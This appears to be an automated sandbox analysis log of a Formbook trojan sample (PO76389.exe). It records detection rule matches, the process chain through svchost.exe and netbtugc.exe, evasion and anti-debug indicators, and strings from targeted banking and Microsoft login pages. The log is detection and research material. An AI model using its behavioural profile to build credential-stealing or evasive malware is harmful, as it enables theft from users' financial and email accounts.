Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/9
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004FD712 GetLastError,FormatMessageW, 0_2_004FD712
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004EB8B0 AdjustTokenPrivileges,CloseHandle, 0_2_004EB8B0
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_004EBEC3
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004FEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_004FEA85
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_004F6F5B
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0050C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_0050C604
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004B31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_004B31F2
            Source: C:\Users\user\Desktop\PO76389.exe | File created: C:\Users\user\AppData\Local\Temp\autF7F4.tmp
            Source: C:\Users\user\Desktop\PO76389.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\PO76389.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000005.00000002.4568560118.00000000029E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4568560118.0000000002A11000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4568560118.00000000029EF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2775801131.00000000029E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO76389.exe | ReversingLabs: Detection: 76%
            Source: PO76389.exe | Virustotal: Detection: 73%
            Source: unknown | Process created: C:\Users\user\Desktop\PO76389.exe "C:\Users\user\Desktop\PO76389.exe"
            Source: C:\Users\user\Desktop\PO76389.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO76389.exe"
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\PO76389.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TrBUxuahdhJ.exe, 00000004.00000002.4568774085.000000000092E000.00000002.00000001.01000000.00000005.sdmp, TrBUxuahdhJ.exe, 00000007.00000002.4568123137.000000000092E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO76389.exe, 00000000.00000003.2095622015.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, PO76389.exe, 00000000.00000003.2095758118.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2436241382.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438409561.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2532684950.0000000003100000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000002.4569857221.00000000030FE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2532291355.0000000002BFF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2535225271.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4569857221.0000000002F60000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2532476916.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500493554.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, TrBUxuahdhJ.exe, 00000004.00000003.2467006248.00000000007FB000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005EB090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_005EB090
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005405A8 push ss; ret 0_2_005405A9
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D7795 push ecx; ret 0_2_004D77A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0252A883 push FFFFFFC7h; retf 2_2_0252AA9A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_025236B0 push eax; ret 2_2_025236B2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0252AEA4 push cs; retf 2_2_0252AEAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_025287F2 push ecx; iretd 2_2_025287FB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031309AD push ecx; mov dword ptr [esp], ecx 2_2_031309B6
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027B1A17 push cs; retf 4_2_027B1A1F
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027AF365 push ecx; iretd 4_2_027AF36E
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe | Code function: 4_2_027BCBEE push eax; ret 4_2_027BCBFE
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F6225F pushad ; ret 5_2_02F627F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F627FA pushad ; ret 5_2_02F627F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F6283D push eax; iretd 5_2_02F62858
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F909AD push ecx; mov dword ptr [esp], ecx 5_2_02F909B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02F61368 push eax; iretd 5_2_02F61369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0062017D push ebp; ret 5_2_006201F3
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00620ACF push ds; iretd 5_2_00620AD0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00620AAF push es; iretd 5_2_00620AB0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_006110B0 push es; retf 6D50h 5_2_0061119D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0060513F push ecx; iretd 5_2_00605148
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_006071D0 push FFFFFFC7h; retf 5_2_006073E7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0061D1B3 push ebx; iretd 5_2_0061D1C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_006077F1 push cs; retf 5_2_006077F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_00623C70 push edi; iretd 5_2_00623C7B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0060DDC3 push ss; rep ret 5_2_0060DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0060DDB9 push ss; rep ret 5_2_0060DDC1
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CAD23A pushad ; ret 5_2_02CAD23C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CA638E push cx; retf 5_2_02CA6390
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CA70C9 push es; retf 5_2_02CA70D5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CA50E3 push 86FB9775h; ret 5_2_02CA50EA
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_02CAEFC8 push ebx; iretd 5_2_02CAF03E
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004CF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004CF78E
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00517F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00517F0E
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004D1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004D1E5A
            Source: C:\Users\user\Desktop\PO76389.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PO76389.exe | API/Special instruction interceptor: Address: DA261C
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031AD1C0 rdtsc 2_2_031AD1C0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 9841
            Source: C:\Users\user\Desktop\PO76389.exe | Evaded block: after key decision graph_0-104527
            Source: C:\Users\user\Desktop\PO76389.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-104979
            Source: C:\Users\user\Desktop\PO76389.exe | API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292 | Thread sleep count: 131 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292 | Thread sleep time: -262000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292 | Thread sleep count: 9841 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1292 | Thread sleep time: -19682000s >= -30000s
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072 | Thread sleep time: -40500s >= -30000s
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072 | Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe TID: 2072 | Thread sleep time: -36000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004CDD92 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004CDD92
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_00502044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00502044
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0050219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0050219F
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_005024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_005024A9
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_004F6B3F
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_004F6E4A
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_004FF350
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004FFD47 FindFirstFileW,FindClose, 0_2_004FFD47
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004FFDD2
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0061C0D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0061C0D0
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_004CE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004CE47B
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: TrBUxuahdhJ.exe, 00000007.00000002.4569048652.000000000127F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
            Source: 1m0Sa73J8.5.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: 1m0Sa73J8.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 1m0Sa73J8.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 1m0Sa73J8.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 1m0Sa73J8.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 1m0Sa73J8.5.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: firefox.exe, 00000008.00000002.2886232519.000002370796D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>;
            Source: 1m0Sa73J8.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: 1m0Sa73J8.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 1m0Sa73J8.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 1m0Sa73J8.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 1m0Sa73J8.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 1m0Sa73J8.5.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 1m0Sa73J8.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: netbtugc.exe, 00000005.00000002.4568560118.000000000296E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9(
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 1m0Sa73J8.5.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 1m0Sa73J8.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 1m0Sa73J8.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\PO76389.exe | API call chain: ExitProcess graph end node graph_0-104331
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031AD1C0 rdtsc 2_2_031AD1C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02537703 LdrLoadDll, 2_2_02537703
            Source: C:\Users\user\Desktop\PO76389.exe | Code function: 0_2_0050703C BlockInput, 0_2_0050703C
